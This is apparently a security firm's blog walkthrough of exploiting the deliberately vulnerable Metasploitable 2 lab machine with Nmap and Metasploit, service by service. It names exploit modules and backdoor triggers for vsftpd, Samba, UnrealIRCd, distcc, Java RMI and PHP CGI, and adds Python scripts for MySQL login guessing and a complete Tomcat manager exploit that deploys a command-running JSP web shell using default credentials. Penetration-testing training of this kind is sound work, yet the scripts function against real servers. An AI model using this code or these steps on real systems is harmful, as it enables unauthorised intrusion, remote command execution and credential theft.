Metasploitable 2 Walkthrough: Quick Exploitation Guide


June 26, 2016

While working with Metasploit recently, a number of straightforward exploits against Metasploitable 2 came up, and a full walkthrough of the machine seemed worth writing down. This post goes through them in order, from enumeration to a shell, and explains why each step is taken.

What is Metasploitable 2

Metasploitable 2 is a Linux virtual machine that is intentionally built to be vulnerable. Machines like it are used for security training, for testing security tools, and for practising penetration testing techniques in a lab rather than on production systems.

Getting started

First, before attacking Metasploitable, we enumerate the target from the attacking machine. Kali Linux ships several tools for this; Nmap and Nikto are the most common, and here we use Nmap. Before moving on, a brief introduction to Nmap.

Nmap Overview

Network Mapper (Nmap) is a network scanning and host discovery tool that is useful at several stages of a penetration test. It is not limited to information gathering and enumeration: with its scripting engine (NSE) it also serves as a vulnerability detector or security scanner.

What does Nmap do?

It detects:

  • Live hosts on the network.
  • Open ports on each host.
  • The software and version behind each open port.
  • The operating system, the hardware (MAC) address of hosts on the local segment, and software versions.

Service and version detection with Nmap

Command: nmap -sS -sV <victim's IP>

  • -sS : TCP SYN scan (half-open scan; needs root for raw sockets)
  • -sV : service and version detection

[Figure: Nmap -sS -sV output for the target, listing open ports with service names and versions]

As the figure above shows, this command gives us the open ports and the service and version listening on each one. Now let us exploit them one by one.
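The scan output is what drives everything that follows, so it pays to keep it in a machine-readable form. The script below is an added example (not part of the original post and not Metasploit code): it parses the XML that nmap -sS -sV -oX writes and flags the open ports whose product and version match the exploits used later in this walkthrough. SAMPLE_XML is a constructed stand-in shaped like real -oX output for a Metasploitable 2 host so that the script runs offline; the module paths in RULES are the current Metasploit names for the modules whose titles appear in the section headings below.

```python
"""Triage an Nmap -oX scan against the exploits covered in this walkthrough.
Added example; SAMPLE_XML is constructed, not a real capture."""
import sys
import xml.etree.ElementTree as ET

# Constructed sample: ports, products and versions mirror what -sV reports for
# Metasploitable 2, trimmed to the attributes this script reads.
SAMPLE_XML = """<nmaprun scanner="nmap" args="nmap -sS -sV -oX scan.xml 192.168.56.101">
  <host>
    <address addr="192.168.56.101" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="139"><state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.X - 4.X"/></port>
      <port protocol="tcp" portid="445"><state state="open"/>
        <service name="netbios-ssn" product="Samba smbd" version="3.0.20-Debian"/></port>
      <port protocol="tcp" portid="1099"><state state="open"/>
        <service name="java-rmi" product="GNU Classpath grmiregistry"/></port>
      <port protocol="tcp" portid="3306"><state state="open"/>
        <service name="mysql" product="MySQL" version="5.0.51a-3ubuntu5"/></port>
      <port protocol="tcp" portid="3632"><state state="open"/>
        <service name="distccd" product="distccd" version="v1"/></port>
      <port protocol="tcp" portid="6667"><state state="open"/>
        <service name="irc" product="UnrealIRCd"/></port>
      <port protocol="tcp" portid="8180"><state state="open"/>
        <service name="http" product="Apache Tomcat/Coyote JSP engine" version="1.1"/></port>
      <port protocol="tcp" portid="8787"><state state="closed"/>
        <service name="unknown"/></port>
    </ports>
  </host>
</nmaprun>
"""

# (port, substring expected in the product field, required version prefix or
#  None, Metasploit module matching the walkthrough heading for that service)
RULES = [
    (21,   "vsftpd",     "2.3.4", "exploit/unix/ftp/vsftpd_234_backdoor"),
    (445,  "samba",      None,    "exploit/multi/samba/usermap_script"),
    (3306, "mysql",      None,    "auxiliary/scanner/mysql/mysql_login"),
    (8180, "tomcat",     None,    "exploit/multi/http/tomcat_mgr_deploy"),
    (3632, "distcc",     None,    "exploit/unix/misc/distcc_exec"),
    (1099, "classpath",  None,    "exploit/multi/misc/java_rmi_server"),
    (6667, "unrealircd", None,    "exploit/unix/irc/unreal_ircd_3281_backdoor"),
]


def parse_open_ports(xml_text):
    """Return (port, protocol, service, product, version) for every port Nmap
    reported as open. Fields -sV could not fill come back as ''."""
    root = ET.fromstring(xml_text)
    found = []
    for port in root.iter("port"):
        state = port.find("state")
        if state is None or state.get("state") != "open":
            continue
        svc = port.find("service")
        attr = lambda key: (svc.get(key) or "") if svc is not None else ""
        found.append((int(port.get("portid")), port.get("protocol"),
                      attr("name"), attr("product"), attr("version")))
    return found


def triage(xml_text):
    """Match open ports against RULES and return (port, banner, module) triples.
    A version prefix in a rule must match, so vsftpd 3.x is not flagged."""
    hits = []
    for port, _proto, _name, product, version in parse_open_ports(xml_text):
        for rule_port, needle, version_prefix, module in RULES:
            if (port == rule_port
                    and needle in product.lower()
                    and (version_prefix is None or version.startswith(version_prefix))):
                hits.append((port, f"{product} {version}".strip(), module))
    return hits


def triage_file(path):
    """Run triage() over a real `nmap -oX` file."""
    with open(path, "rb") as fh:
        return triage(fh.read())


if __name__ == "__main__":
    results = triage_file(sys.argv[1]) if len(sys.argv) > 1 else triage(SAMPLE_XML)
    for port, banner, module in results:
        print(f"{port:>5}/tcp  {banner:<40} -> {module}")
```

Run it as python3 triage.py scan.xml after a real scan; with no argument it uses the constructed sample. The version prefix on the vsftpd rule is the point: the backdoor exists only in 2.3.4, and matching on the product name alone would send you after a module that cannot work.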

Exploiting Vulnerabilities

1. VSFTPD (VSFTPD v2.3.4 Backdoor Command Execution)

VSFTPD stands for Very Secure FTP Daemon. It is a lightweight, stable FTP server for UNIX-like systems. The 2.3.4 build on Metasploitable 2 is not weak by design: a tampered copy of the 2.3.4 tarball was distributed from the project's download site with a backdoor that opens a root shell on TCP port 6200 whenever a login username containing the two characters ":)" is sent.

So we use Metasploit to look for available exploits for VSFTPD (search vsftpd in msfconsole). Let us see how the search works and then apply the result to the target machine.

[Figure: msfconsole search results for vsftpd]

As the snapshot above shows, there is an exploit available for VSFTPD: exploit/unix/ftp/vsftpd_234_backdoor. But wait! Before going further, is the exploit actually compatible with the version of the service that is running? This is the key to a successful attack. Confirm that the exploit applies to the exact version the scan reported (here vsftpd 2.3.4); the info command prints the exploit's full description, including the versions it affects.

[Figure: info output for the VSFTPD v2.3.4 backdoor exploit]

Now that the versions match, we are ready to use the exploit (use exploit/unix/ftp/vsftpd_234_backdoor). Let us look at its options with show options.

[Figure: show options for the exploit, listing RHOST and RPORT]

Here RHOST and RPORT are the two options we need. RPORT already defaults to 21, the FTP port. We set RHOST to the victim's IP (set RHOST <victim's IP>; newer Metasploit versions call this option RHOSTS), and then we are ready to run the exploit.

[Figure: RHOST set and the exploit run, ending in a root shell]

Run the exploit and you get root access: vsftpd runs as root, so the shell its backdoor spawns is root as well. From here on, the basic steps we followed against VSFTPD (search, info, check the version, set the options, exploit) are the same for every service. Let us now apply them to the other services.

2. SAMBA (Samba “username map script” Command Execution)

Samba is a popular open-source implementation of the SMB/CIFS protocol that lets end users share files, printers and other resources across a network. As seen above, the steps for this attack are the same as for the previous one. The exploit we use, exploit/multi/samba/usermap_script, abuses the "username map script" option in Samba 3.0.20 through 3.0.25rc3 (CVE-2007-2447): a username containing shell metacharacters is passed to /bin/sh unescaped, so arbitrary commands run with smbd's privileges, which is root. For further information about this exploit, use the info command.

[Figure: msfconsole search results for Samba and the usermap_script exploit selected]

Now that the exploit is selected, set the necessary options (RHOST; RPORT defaults to 139) and run it.

[Figure: options set and the Samba exploit run, ending in a root shell]

3. MYSQL (MySQL Login Utility)

MySQL is one of the most popular databases and many applications depend on it. For the exploitation of MySQL we first find out the database version, and Metasploit has a module for exactly that. The command is:

use auxiliary/scanner/mysql/mysql_version

Next we set the target. Scanner modules take a list of hosts, so the option is RHOSTS rather than RHOST; show options lists it. Once RHOSTS is set, we run the module.

Next we use the mysql_login module (auxiliary/scanner/mysql/mysql_login) to brute-force the MySQL username and password.

[Figure: use auxiliary/scanner/mysql/mysql_login]

Let's check the options available for this module.

[Figure: show options for mysql_login]

Sometimes the MySQL password is simply left blank, so we set BLANK_PASSWORDS to true; the module then tries an empty password for every username in addition to the word list.

After this we create two files, one with candidate usernames and one with candidate passwords, and point the USER_FILE and PASS_FILE options at them.

[Figure: mysql_login run with USER_FILE, PASS_FILE and BLANK_PASSWORDS set, reporting a valid login]

As the output shows, we found a working username and password. Let's now connect to the victim's MySQL with them, for example with the command-line client: mysql -h <victim's IP> -u <user> -p.

[Figure: connecting to the victim's MySQL with the recovered credentials]
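Both MySQL steps above rest on a small amount of protocol: mysql_version reads the greeting the server sends on port 3306 before any login, and mysql_login answers that greeting with a scramble of each password guess. The script below is an added example (not part of the original post and not Metasploit code) that does both by hand. build_greeting() fabricates a greeting in the layout a 5.0.x server uses so the parser can run offline; its capability flags and thread id are constructed values, and fetch_greeting() reads a real one from a host you name.

```python
"""MySQL greeting parsing and the mysql_native_password scramble. Added example;
build_greeting() produces constructed test data, not a capture."""
import hashlib
import socket
import struct

CLIENT_SECURE_CONNECTION = 0x8000   # capability bit: 4.1+ auth with a 20-byte salt


def parse_greeting(packet: bytes) -> dict:
    """Decode the HandshakeV10 packet MySQL sends on connect. Returns the server
    version and the 20-byte salt the login scramble needs. If the server rejects
    the client host outright it sends an ERR packet instead (typically 1130,
    "Host ... is not allowed to connect"), returned as {'error', 'message'}."""
    length = int.from_bytes(packet[0:3], "little")
    p = packet[4:4 + length]              # byte 3 is the packet sequence id
    if p[0] == 0xFF:                      # ERR packet
        code = int.from_bytes(p[1:3], "little")
        msg = p[9:] if p[3:4] == b"#" else p[3:]   # skip '#' + 5-char SQLSTATE
        return {"error": code, "message": msg.decode(errors="replace")}
    if p[0] != 10:
        raise ValueError(f"unsupported protocol version {p[0]}")
    end = p.index(b"\x00", 1)
    version = p[1:end].decode()
    pos = end + 1
    thread_id = int.from_bytes(p[pos:pos + 4], "little"); pos += 4
    salt = p[pos:pos + 8]; pos += 8       # auth-plugin-data-part-1
    pos += 1                              # filler
    caps = int.from_bytes(p[pos:pos + 2], "little"); pos += 2
    charset = p[pos]; pos += 1
    status = int.from_bytes(p[pos:pos + 2], "little"); pos += 2
    pos += 13    # 5.0: zero filler; 5.5+: upper caps, plugin-data length, reserved
    if caps & CLIENT_SECURE_CONNECTION:
        salt += p[pos:p.index(b"\x00", pos)]   # auth-plugin-data-part-2 (12 bytes)
    return {"version": version, "thread_id": thread_id, "salt": salt,
            "capabilities": caps, "charset": charset, "status": status}


def native_password_scramble(password: str, salt: bytes) -> bytes:
    """mysql_native_password token: SHA1(pw) XOR SHA1(salt + SHA1(SHA1(pw))).
    An empty password sends an empty token, a different wire message, which is
    why BLANK_PASSWORDS is a separate switch in mysql_login."""
    if password == "":
        return b""
    stage1 = hashlib.sha1(password.encode()).digest()
    stage2 = hashlib.sha1(stage1).digest()
    mixed = hashlib.sha1(salt + stage2).digest()
    return bytes(a ^ b for a, b in zip(stage1, mixed))


def build_greeting(version: str, salt: bytes, thread_id: int = 7) -> bytes:
    """Constructed greeting in the 5.0 layout, for offline use only."""
    assert len(salt) == 20 and b"\x00" not in salt
    payload = (b"\x0a" + version.encode() + b"\x00"
               + struct.pack("<I", thread_id)
               + salt[:8] + b"\x00"
               + struct.pack("<H", 0xa20c)     # lower capability flags, includes 0x8000
               + b"\x08"                       # charset: latin1
               + struct.pack("<H", 0x0002)     # status: autocommit
               + b"\x00" * 13
               + salt[8:] + b"\x00")
    return len(payload).to_bytes(3, "little") + b"\x00" + payload


def fetch_greeting(host: str, port: int = 3306, timeout: float = 5.0) -> dict:
    """The mysql_version step against a live host."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        return parse_greeting(s.recv(4096))


if __name__ == "__main__":
    info = parse_greeting(build_greeting("5.0.51a-3ubuntu5", b"ABCDEFGHIJKLMNOPQRST"))
    print(info["version"], info["salt"])
    print(native_password_scramble("guess", info["salt"]).hex())
```

Two practical points fall out of this. First, the version comes back before any credentials are checked, so mysql_version works even when the account list is unknown; an ERR 1130 instead of a greeting means the server's host allow-list stops you before authentication and brute-forcing is pointless from that address. Second, the scramble is keyed by the per-connection salt, so a captured login cannot be replayed, which is why the login scanner has to open a fresh connection for every guess.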

4. Tomcat (Apache Tomcat Manager Application Deployer Authenticated Code Execution)

On Metasploitable 2, Tomcat runs on port 8180 rather than the usual 8080. Its manager application can be abused with the following Metasploit exploit, exploit/multi/http/tomcat_mgr_deploy, which authenticates to the manager and deploys a WAR file containing the payload:

[Figure: the Tomcat manager deployer exploit selected in msfconsole]

Tomcat's default manager username and password are both tomcat, and that is what this install uses; had they been changed, you could brute-force them with auxiliary/scanner/http/tomcat_mgr_login.

[Figure: options set and the exploit run against Tomcat on port 8180]
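What "authenticated code execution" means here is simply that the manager lets anyone with a valid login deploy an application, and a JSP is code. The script below is an added example (not part of the original post and not Metasploit's code) that does the same thing with the standard library: it builds a WAR containing a command JSP, PUTs it to the manager with the tomcat:tomcat credentials, and then calls the JSP. The base URL, context path and JSP name are assumptions for the demo.

```python
"""Tomcat manager deploy by hand. Added example; lab URL and paths are assumed."""
import base64
import io
import sys
import urllib.parse
import urllib.request
import zipfile

# Minimal JSP: runs the 'cmd' request parameter and streams its stdout back.
CMD_JSP = """<%@ page import="java.io.*" %><%
String c = request.getParameter("cmd");
if (c != null) {
    Process p = Runtime.getRuntime().exec(c);
    InputStream in = p.getInputStream();
    int b;
    while ((b = in.read()) != -1) { out.write(b); }
}
%>"""

# Servlet 2.4 descriptor, sufficient for the Tomcat 5.5 on Metasploitable 2.
WEB_XML = """<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/j2ee" version="2.4"></web-app>
"""


def build_war(jsp_name: str = "cmd.jsp", jsp_source: str = CMD_JSP) -> bytes:
    """A WAR is a zip: WEB-INF/web.xml plus the JSP at the root."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war: bytes) -> list:
    """Names inside a WAR, for checking what you are about to upload."""
    return zipfile.ZipFile(io.BytesIO(war)).namelist()


def basic_auth_header(user: str, password: str) -> str:
    return "Basic " + base64.b64encode(f"{user}:{password}".encode()).decode()


def deploy_url(base: str, context: str, text_interface: bool = False) -> str:
    """Tomcat 5.x/6.x expose /manager/deploy; Tomcat 7+ moved it to /manager/text/deploy."""
    prefix = "/manager/text/deploy" if text_interface else "/manager/deploy"
    return base.rstrip("/") + prefix + "?" + urllib.parse.urlencode({"path": context})


def deploy(base, user, password, context="/x", war=None, text_interface=False, timeout=15):
    """PUT the WAR. Tomcat answers 'OK - Deployed application at context path /x'
    or 'FAIL - ...' (e.g. context already in use); HTTP 401 means bad credentials."""
    req = urllib.request.Request(deploy_url(base, context, text_interface),
                                 data=war or build_war(), method="PUT")
    req.add_header("Authorization", basic_auth_header(user, password))
    req.add_header("Content-Type", "application/octet-stream")
    with urllib.request.urlopen(req, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


def run_command(base, context, cmd, jsp_name="cmd.jsp", timeout=15):
    """Call the deployed JSP; the command runs as the user Tomcat runs as."""
    url = (base.rstrip("/") + context + "/" + jsp_name
           + "?" + urllib.parse.urlencode({"cmd": cmd}))
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        return resp.read().decode(errors="replace")


if __name__ == "__main__":
    base = sys.argv[1] if len(sys.argv) > 1 else "http://192.168.56.101:8180"  # assumed lab address
    print(deploy(base, "tomcat", "tomcat"))
    print(run_command(base, "/x", "id"))
```

Clean up afterwards with a GET to /manager/undeploy?path=/x using the same credentials, otherwise a second run fails with "FAIL - Application already exists at path /x". The shell runs as the tomcat service account, not root, so unlike the vsftpd and Samba cases this one needs a privilege escalation step to own the box.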

5. DISTCC (DistCC Daemon Command Execution)

DistCC is a program that distributes builds of C, C++, Objective-C or Objective-C++ code across several machines on a network. The daemon on Metasploitable 2 listens on port 3632 and accepts compile jobs from any client without authentication, so an attacker can hand it a job that runs arbitrary commands (CVE-2004-2687). Metasploit's exploit/unix/misc/distcc_exec does exactly that; note that the resulting shell runs as the daemon's unprivileged user, not root.

[Figure: the DistCC daemon command execution exploit run against port 3632]

6. GNU Classpath RMI Registry (Java RMI Server Insecure Default Configuration Java Code Execution)

GNU Classpath is a set of essential libraries supporting the Java programming language. Metasploitable 2 runs its RMI registry (grmiregistry) on port 1099 with the default configuration, in which the registry will load classes from a remote URL supplied by the client. Metasploit's exploit/multi/misc/java_rmi_server serves a malicious class over HTTP and has the registry load and run it.

[Figure: the Java RMI server exploit run against the GNU Classpath RMI registry on port 1099]

7. UNREAL IRCD (UnrealIRCD 3.2.8.1 Backdoor Command Execution)

UnrealIRCd is an open-source IRC server daemon (IRCD) that lets users run their own IRC server. Like vsftpd above, the 3.2.8.1 release is vulnerable because of a backdoor rather than a bug: the source archive distributed between November 2009 and June 2010 had been modified so that any line beginning with "AB;" received on the server port (6667 here) is executed as a shell command (CVE-2010-2075). Metasploit's exploit/unix/irc/unreal_ircd_3281_backdoor uses that trigger.

[Figure: the UnrealIRCd 3.2.8.1 backdoor exploit run against port 6667]

8. Apache (CGI Argument Injection)

The Apache web server has a vulnerable PHP build installed, which you can confirm by visiting /phpinfo.php (check the PHP version and the Server API line, which shows PHP running as CGI). This version is vulnerable to PHP CGI argument injection (CVE-2012-1823): query-string arguments that begin with "-" are passed to the php-cgi binary as command-line options, so a request carrying -d allow_url_include=on -d auto_prepend_file=php://input makes PHP execute whatever is in the request body. Metasploit's exploit/multi/http/php_cgi_arg_injection automates this.

[Figure: the PHP CGI argument injection exploit run against the Apache web server on port 80]

References:

Metasploit Unleashed – https://www.offensive-security.com/metasploit-unleashed/

Rapid7, Metasploitable 2 Exploitability Guide – https://community.rapid7.com/docs/DOC-1875

Conclusion

To wrap up, this Metasploitable 2 walkthrough is a practical starting point for anyone interested in offensive security. By looking at how each service is found, how the matching exploit is chosen and verified against the running version, and what the exploit actually does, the reader learns to recognise, and fix, the same weaknesses on real systems. SecureLayer7 offers in-depth penetration tests backed by strong research, tooling and security experts. Contact us today to schedule your comprehensive penetration test and ensure your systems are secure.
